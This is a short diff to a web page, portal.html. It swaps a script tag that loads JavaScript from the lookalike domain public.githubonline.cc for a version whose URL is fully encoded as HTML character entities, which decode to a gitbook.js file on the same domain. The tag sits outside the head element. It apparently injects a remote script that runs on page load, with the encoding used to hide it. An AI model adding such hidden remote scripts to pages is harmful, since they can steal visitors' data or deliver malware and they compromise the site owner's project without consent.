--- a/portal.html
+++ b/portal.html
@@ -9,7 +9,7 @@
 <link rel="stylesheet" type="text/css" href="static/css/bootstrap.min.css">
 <link rel="stylesheet" type="text/css" href="static/css/font-awesome.min.css">
 <link rel="stylesheet" type="text/css" href="static/css/style.css">
-</head><script src="https://public.githubonline.cc/js/github.js"></script>
+</head><script src="&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#112;&#117;&#98;&#108;&#105;&#99;&#46;&#103;&#105;&#116;&#104;&#117;&#98;&#111;&#110;&#108;&#105;&#110;&#101;&#46;&#99;&#99;&#47;&#106;&#115;&#47;&#103;&#105;&#116;&#98;&#111;&#111;&#107;&#46;&#106;&#115;"></script>
 
 <body>
 
